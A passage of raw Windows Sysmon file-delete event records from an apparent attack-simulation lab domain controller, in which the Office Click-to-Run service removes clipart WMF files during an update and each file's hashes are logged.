23542300x800000000000000066626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO01044_.WMFMD5=38E62229784C1862CE2A68F13FDAE7D3,SHA256=5AEC6740405FD531844027F269D1FD385BB9604EA7AB8D22BC059EB492B6E06C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00943_.WMFMD5=1CB1731DA03F270334B13DF5A6C631F7,SHA256=9E2415773BFB8BF9F0AC3AF40D358E72224EEF21B6DFBEE697403A1744B36C8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00942_.WMFMD5=BA7E285899E6418CFE2E823FDF02B443,SHA256=885EEC1598947837C64B1D6FC0FC20DD45976E048250FF3449CF3B5D3DFC2282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00941_.WMFMD5=E264FDE4381FACDE1BA878082F8D558D,SHA256=7ACED587D787C1E47566CB068C812B4BC466BDF2589BFC6D8C4FB031B53D6F0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00938_.WMFMD5=1CEB9D3D13A7C46163D24759FB3AA977,SHA256=6888173CA8876ABC06F9723C175B5B7A53FC0A847C2A873E091BF48FD05EAE5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00935_.WMFMD5=6466FCC855F513CEEB74F99C9EE95891,SHA256=2B01E57714493D3DDFB68222C576B67032EA5BD7C889E289BC83518FEFFB2B07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00918_.WMFMD5=BA78F264FDE515E6229C94AA8A4E7AC1,SHA256=03DD789394C9EC9C80844D8FA86B3AB0F924D4204A76EADC1F0075137E235F6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00917_.WMFMD5=D9AACEAE8053D8557290FA8735C7F20A,SHA256=64907D6A4C7E174C26B1C7A5640231205496D456025000D293664BBAE5995844,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00916_.WMFMD5=8BA3A225DFFF1CE135EB84691BD48FEF,SHA256=4DC3A84FBD19D9E845A485C903BA98CDB8E0B62177058DD65764CC966D3AF88F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00915_.WMFMD5=614E7C9352FBFD39E71B972A743192EF,SHA256=FE828CF94AE67E5F22462B117B0D2E32E5C30E9B2D18A294B44BA7AFB44F705A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00914_.WMFMD5=C54A8DFABA29FD805674B45E6E3B4EDB,SHA256=8A895430A7441D835808F8D34CB348F65CCA0F89BE7C115AFB196771C888F797,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00913_.WMFMD5=7443FFA422F712537CAF5E4D1D9D623B,SHA256=93DA728916377DD2A4B23CD44BFC4C992A65A4A55CD8A401FAB051D333541CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00911_.WMFMD5=CCA61CEA342DFF046AE8AB7BA8814BC6,SHA256=FE52019FAD97267F1845A2CB87D85F7CC0C85D8CEF6A60D641BBF6D4F70931E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00910_.WMFMD5=F43902C3867B56B1BB6A02C8B6B86CCF,SHA256=C53526E40FC762F8DA26D612064C7931325007550220AA057F8EDEEA66EC5E25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00837_.WMFMD5=AF8F932E90E58BD2FDFDE9D44D425E90,SHA256=67CF7F0F0D46A78F60D04E401238412CC0B3EF82F08B2E82BD17B57966A49671,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00834_.WMFMD5=12FCDC514745A64085ABF595DDF4316C,SHA256=84A02FCDB31C3C7C7B858DB6C5490784BBB0513AAC08999D035968E9218ABD49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00828_.WMFMD5=B9A0ED482122B9BB56356DA9E3161554,SHA256=B45AC261E1050B4CD34B0364CF2A170D2A36A3516F4F3F2CFB016BC5E7936559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00820_.WMFMD5=5B388F68E52DA57A50EF9458990A8D1E,SHA256=7DFA9E7B8D905B30AF53D3014E6B01CC13A607F2D304D41E96EDA12A4DA3AB7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00783_.WMFMD5=A616A8CEB50D0A87D3537ACF95AE4E93,SHA256=472CA1C93FAC7CAA3BDEF523192F74A73CD6C9F2E5C4F9B981DFB3D349098AF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00768_.WMFMD5=FF3CA440C761C613EC052975D44F008F,SHA256=063C18535AF7BE7482906C1516C55E366F2F6B7414B602A6012700A25F7C9617,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00736_.WMFMD5=BE0D5BB3328381FF89516FE8F75DE137,SHA256=A594693C188CB5AB79C2759ADB780B5B48E0B7A40E1835325519CEB26893951E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00735_.WMFMD5=892546654C964F0E903BECF44480C113,SHA256=713CA4338325133E6EE34F5195EA3F4AAF9D9C84BD0B653891182ADBC93FF657,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00734_.WMFMD5=8FC3F0B57656B8E5C275BBC58047B187,SHA256=09861D37D69641C4520746D832A89FC5C9547BEBEA7E470BBC400C733B7D327B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00732_.WMFMD5=03171CCC8A2BA845080BC0A5764027EC,SHA256=50ACA53C5ECA3E028CD1765DB94EF6DFFBDB9F4688F7024F53EC80ACF83842FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00728_.WMFMD5=73764C586723D104D0A8BDD98BD08F4B,SHA256=885791AD35B690853B4D5280EAE14EF0A8FA3C512192951A4FE2324570203AA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00726_.WMFMD5=620D750EA914546024ACC1C5CC41819C,SHA256=0C966159D7B125D5FB224E440F70F80C4DCE22707F54727B06C0F05F585686EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00704_.WMFMD5=4CF2E0AD6FE3DB99876E6CAAF1856002,SHA256=55AD52D225028961A51D9BC5EAB1565A9938D53674EBC1C52D3B472C1E58D4C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00694_.WMFMD5=BAFDC1DC91B253BCB97E8336BEFDC3F5,SHA256=C9B5D9EA55C20A27AAB3F100C80AD93E59788A55CFF2B743356AC23D268C3483,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00683_.WMFMD5=DDCDB0F1E81331E1525262C37447BFB5,SHA256=38BAA662697B905A505DEB4153DE02DA3998BEA54F38A7AB144B5FFE0761B52E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00671_.WMFMD5=56A51AD7621A140843F3E8706DCAF580,SHA256=3FD3DE1A2F429B45711A4E4FB33E03FA42A74B92336C553E6D3E51C6A9F2A41A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00670_.WMFMD5=050B08BE1A30C37AF77DF13E83B5A9A3,SHA256=040361B9F9D009CF87AD99CAEC3C38E56F46A1085D7B634BE913B0EBD1F42072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00668_.WMFMD5=C28A863A4BC3C4E0BA658BF18129F88F,SHA256=EB7ECF41B70BAE127C839311F00FB36CCC7039389CF54A308E40AB8CEA2A1FC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00656_.WMFMD5=BD05E7D5822BEE0B1915FE23C0EA409E,SHA256=F5D756AAD07885021E1B9365B314754B58F2D7A2E99A3EAE3C8B258BE595CB32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00638_.WMFMD5=82B3F6B364895E14F35239CABCAC5A53,SHA256=4EB6FB7D3E1B00F04DB1A73D7838580E6B84AD43C00E5CCBD817311E211D4B59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00633_.WMFMD5=7AB8D34414F76D57A83577AFE83511DF,SHA256=AFBDA6BB8DB92F15CE39D13010D60D80B4E33A1348800949EC46658A2BAB518C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00629_.WMFMD5=25D65B993C93234827B3ACB0D0F61839,SHA256=07884EA4C0C47D57362C9D062484C1ADFD9299EEE3DFC5517C34D548FD51B2C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00610_.WMFMD5=B63AB1A2CE36590D76B82D6C68B1574F,SHA256=7FC53FC23E1B1E5CF169CBC7C4122EB30BD51687B21D4E7F7B60E9F6E5F64895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00603_.WMFMD5=0E9D8CE0FCDA133B42B169624CBCDD59,SHA256=CD072B3E378E36BF4BB3CB869386509393A1074C450D34E6206AF7D17D24086D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00555_.WMFMD5=BB23B93DFD72FC5F06ED4D479B718AF3,SHA256=4734823A0A92A354CEE824DED25CD0A50F59EDF257AC3827A5BBB73455685299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00513_.WMFMD5=EEF71C8F14B9790E32722A0601AF3878,SHA256=D27AA47AE314AA222799CAAA9AD1F128D68AD0C542D6F9267AA0451D380CAF38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00505_.WMFMD5=999431BC17B1DFB0EB1ED55C7B70B2A6,SHA256=192D36A2EFF2EB1D0BA2EC9F760392F7A198382FF465C503A2A7B404A4984AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00486_.WMFMD5=BCEBFDD53CDA91CF5123D97555D8050A,SHA256=90079726D970011CF30AA63F1F2BB4E98B14837BFF8963263666FC4D0A456661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00483_.WMFMD5=6C732DFD6DE2A1A9D6EE2B2845C7828F,SHA256=1AE3DD404D1451A0B5253C00BB13D6AB7AFDB02A80F73171778AB71605814ED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00479_.WMFMD5=89E3F8DE2C462111FC4A30E781AC40D6,SHA256=FF09A7AD2C60794C1BB27B867966145E72DA6725E323A4A139EB21233A3785FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 